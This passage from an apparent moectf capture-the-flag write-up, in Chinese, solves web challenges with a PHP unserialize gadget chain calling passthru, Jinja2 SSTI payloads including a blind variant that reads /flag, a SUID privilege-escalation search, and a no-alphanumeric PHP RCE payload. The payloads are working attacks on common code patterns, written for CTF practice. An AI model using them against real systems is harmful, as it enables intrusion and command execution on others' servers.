        {
            die("Hacker!");
        }
        else
        {
            var_dump($name($age));
        }
    }

    public function __wakeup()
    {
        $name = $this->id;
        $name->age = $this->age;
        $name($this);
    }
}

if(isset($_GET['person']))
{
    $person = unserialize($_GET['person']);
}
<?php

class Person
{
    public $name;
    public $id;
    public $age;
}

class PersonA extends Person
{
}

class PersonB extends Person
{
}

class PersonC extends Person
{
}

$a=new PersonA();
$a->name=new PersonC();
$a->id="check";
$a->age='env';
$a->name->name="passthru";
echo serialize($a);
#PersonA::__destruct()->PersonC::check()
GET:person=O:7:"PersonA":3:{s:4:"name";O:7:"PersonC":3:{s:4:"name";s:8:"passthru";s:2:"id";N;s:3:"age";N;}s:2:"id";s:5:"check";s:3:"age";s:3:"env";}

image-20250908094122084

moectf{884d956e-2a19-6445-8e49-a77dba1e043a}

20 第二十章 幽冥血海·幻语心魔

先简单测试一下,admin和万能密码登录看到回显admin的时候就猜测是ssti,来个{{7*7}}尝试正确

image-20250908094428548

GET:username={{lipsum.__globals__['os'].popen('cat /flag').read()}}&password=1'+or+1=1#

image-20250908094621222

moectf{a8271eb6-ff04-d97c-93c7-4a1865d66bd6}

21 第二十一章 往生漩涡·言灵死局

过滤了__, global, {{`, `}},分别绕过即可

GET:username={%print lipsum["\x5f\x5fglo""bals\x5f\x5f"]['os'].popen('cat /flag').read()%}&password=1'+or+1=1#

image-20250908144143889

moectf{6974bf4f-e2af-97b4-7055-642d621dea0d}

122 第二十二章 血海核心·千年手段

这个需要看源代码了,如下

from flask import Flask, request, render_template, render_template_string

app = Flask(__name__)

@app.route('/')
def index():
    if 'username' in request.args or 'password' in request.args:
        username = request.args.get('username', '')
        password = request.args.get('password', '')

        if not username or not password:
            login_msg = """
            <div class="login-result" id="result">
                <div class="result-title">阵法反馈</div>
                <div id="result-content"><div class='login-fail'>用户名或密码不能为空</div></div>
            </div>
            """
        else:
            login_msg = f"""
            <div class="login-result" id="result">
                <div class="result-title">阵法反馈</div>
                <div id="result-content"><div class='login-success'>Welcome: {username}</div></div>
            </div>
            """
            render_template_string(login_msg)
    else:
        login_msg = ""

    return render_template("index.html", login_msg=login_msg)

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)

注意到这里尽管进行了模块渲染,但是并没有将渲染之后的结果展示出来,而是将直接拼接的字符串展示出来,有种未被渲染的错觉,这里就可以使用无回显ssti,参考SSTI无回显处理(新回显方式) - tammy66 - 博客园

但是这里尝试直接读取flag未成功,还要提权?

GET:username={{lipsum.__globals__.__builtins__.setattr(lipsum.__spec__.__init__.__globals__.sys.modules.werkzeug.serving.WSGIRequestHandler,"protocol_version",lipsum.__globals__.__builtins__.__import__('os').popen('ls+-la+/flag').read())}}&password=1

image-20250908153835234

先找一下能提权的方法

GET:username={{lipsum.__globals__.__builtins__.setattr(lipsum.__spec__.__init__.__globals__.sys.modules.werkzeug.serving.WSGIRequestHandler,"protocol_version",lipsum.__globals__.__builtins__.__import__('os').popen('find+/+-user+root+-perm+-4000+-print+2>/dev/null').read())}}&password=1

image-20250908152532881

参考rev | GTFOBins,但是仍然读取不成功

GET:username={{lipsum.__globals__.__builtins__.setattr(lipsum.__spec__.__init__.__globals__.sys.modules.werkzeug.serving.WSGIRequestHandler,"protocol_version",lipsum.__globals__.__builtins__.__import__('os').popen('/usr/bin/rev+/flag+|+/usr/bin/rev').read())}}&password=1

1这是…Webshell?

<?php
highlight_file(__FILE__);
if(isset($_GET['shell'])) {
    $shell = $_GET['shell'];
    if(!preg_match('/[A-Za-z0-9]/is', $_GET['shell'])) {
        eval($shell);
    } else {
        echo "Hacker!";
    }
}
?>

无字符rce,异或就行,参考无字母数字 RCE 的总结 | X1ongSec

GET:shell=$_=(">">"<");$__=(">">"<")%2b(">">"<");$___=(~'澞'[$__]).(~'猬'[$_]).(~'猬'[$_]).(~'湚'[$__]).(~'獬'[$_]).~('狴'[$_]);$____='_'.(~'溯'[$__]).(~'淰'[$__]).(~'沬'[$__]).(~'湫'[$__]);$_____=$$____;$___($_____[_]);
POST:_=system("cat /f*");

image-20250908163437112

moectf{0c48c840-be3f-9473-d68c-06aeb3539bff}

1这是…Webshell?_revenge